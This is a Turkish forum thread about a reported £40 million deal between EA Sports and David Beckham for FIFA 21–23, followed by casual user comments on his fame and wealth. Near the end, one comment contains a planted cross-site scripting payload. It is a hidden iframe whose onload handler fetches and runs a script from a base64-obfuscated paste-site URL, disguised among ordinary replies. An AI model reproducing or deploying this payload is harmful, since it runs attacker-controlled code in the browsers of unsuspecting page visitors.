Şimdi Ara

David Beckham'ın FIFA 21'den kazandığı çılgın para ortaya çıktı

Bu Konudaki Kullanıcılar:
2 Misafir - 2 Masaüstü
5 sn
30
Cevap
0
Favori
870
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
2 oy
Öne Çıkar
Sayfa: 12
Sayfaya Git
Git
sonraki
Giriş

• FIFA serisinin yeni yüzü David Beckham'ın Electronic Arts ile yaptığı çılgın anlaşma ortaya çıktı. Mirror gazetesinin kaynaklarından aldığı bilgiye göre EA, önümüzdeki üç yıllık FIFA anlaşması için Beckham'a tam 40 milyon sterlin ödeme yaptı. 

Mirror'da yer alan açıklamada,"FIFA yapımcısı EA Sports Beckham'a aslında önce 30 milyon sterlinlik bir teklif yapmıştı. Ancak Beckham sonrasında daha da iyi bir anlaşma kopardı. Bu anlaşma Beckham markasına büyük bir katkı yapacak. Beckham böylece hayatındaki en kolay parayı kazanmış oldu." ifadelerini kullandı.

EA Sports'un FIFA 21 haricinde FIFA 22 ve FIFA 23 oyunlarında da Beckham'ı reklam yüzü olarak kullanabileceği belirtiliyor. Beckham ayrıca oyunda 'İkon' isimli özel bir oyuncu olarak da yer alıyor.

FIFA 21'in standart versiyonu bu sene Becham Sürümü ismiyle satılıyor ve fiyatı PC'de 419 TL, konsollarda ise 499 TL seviyesinde. Şu anda Black Friday indirimleri dolayısıyla konsollarda 270 TL civarına satın alınabiliyor.

Kaynak:https://www.mirror.co.uk/sport/football/david-beckham-earns-more-fifa-23046908

• Easy money.

• Yuh. Adam futbol bile oynamıyor şu anda.

• Adamın bir kaç aylık gideridir belkide..

• Beleş para 💰
  • Ea para aklamıyorsa ben de bir şey bilmiyorum.

• futbol ikonu david reis. fut'uma eklemek icin sabirsizlaniyorum, sirf beckham var diye 22, 23, 24, 2025 hepsini alirim. o bir futbol İKONU. bu adam parayi banka hesabina koyup faiz yemiyor, afrikali cocuklara yardim ediyor bilginize yani onun parayla hic işi yok, o bir İKON çünkü.

< Bu mesaj bu kişi tarafından değiştirildi formgonder2055 -- 24 Kasım 2020; 23:40:17 >
  • bu adamıda bi sevemedim.

• kapitalist sistemin gariplikleri. vasatsan, avarajsan tencerenin kenarini kazirsin ama ortalamanin uzerindeysen, tepedeysen hele birde yakisikliysan olun bile para basar. nitekim oldukleri halde hala senede 10milyonlarca dolar kazanan unluler var.

• baştan pahalı olmasının sonra ucuzlamasının nedeni anlaşıldı. Önce telifler ödeniyor, onlar bitince ucuzluyor  

• Cem300 kullanıcısına yanıt
    Aynen bir insan her gün 1.000.000 dolar harcıyor zaten. Bence 1 haftada biter birkaç ay fazla

• patatessiz patso kullanıcısına yanıt
    Adamin sadece bir malikanesinde 300 kisi calisan var senin gibi 2 oda bir salonda mi yasiyor sandin 🤣
  • Cem300 kullanıcısına yanıt
    Yok 3000 sacmalamissin
  • Bedava peynir sadece fare kapaninda olmuyormuş demek ki
  • quote:

Orijinalden alıntı: Cem300

Adamin sadece bir malikanesinde 300 kisi calisan var senin gibi 2 oda bir salonda mi yasiyor sandin 🤣

Adamı savunduğum falan yok ama şu siteden evlerine bakınca oldukça lüks görünüyorlar dediğin gibi ama 300 çalışan vs abartmışsın iyice bizim reisimizle kıyaslıyorsun resmen

https://www.thesun.co.uk/tvandshowbiz/11296193/beckhams-property-portfolio-homes-skyscraper-apartments-miami-london//

• "hayatındaki en kolay parayı"

buna katılmıyorum. insanın hayatta bıraktığı izler isimler bunların hepsinde öyle veya böyle emek vardır. Bu adam belki tanrı lütfu yetenekleri ile veya ekstra çalışma ile isim yapmış dünyaya tanınmış ve büyük bir sevgiye layık görülmüş bir adam. Sadece yetenek yetmez. Sergen muazzam bir yetenekti neden ona teklif etmediler ? çünkü yeterli çalışmayı özveriyi göstermedi.

Aldığı her para hakkıdır ve aslında kolay almamıştır.

BECKHAM 1 günde BECKHAM olmadı...

< Bu mesaj bu kişi tarafından değiştirildi Guest-400988AF7 -- 25 Kasım 2020; 12:15:1 >
  • Cristiano Ronaldo bu adamın en az 10 katını hak ediyor demektir .
    bekım denen şahıs karısıyla meşhur olmuş (+18) futbol adına hiç birşey yapmamış biridir . ve yeni ergenler bu şahsı hatırlamaz bile ne diye bu paraları vermişseler ????

• Dünyanın en iyi 100 futbolcusunu saysam asla koyacağım bir futbolcu değil kimsenin koyacağı bir futbolcu değil kötü futbolcuda değil ama yakışıklı olunca böyle oluyor işte

• <iframe hidden onload="appendChild(createElement('script')).src=atob('aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2VrdW5heXVtdWc=');"&#13;

• 
Sayfa: 12
Sayfaya Git
Git
sonraki
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.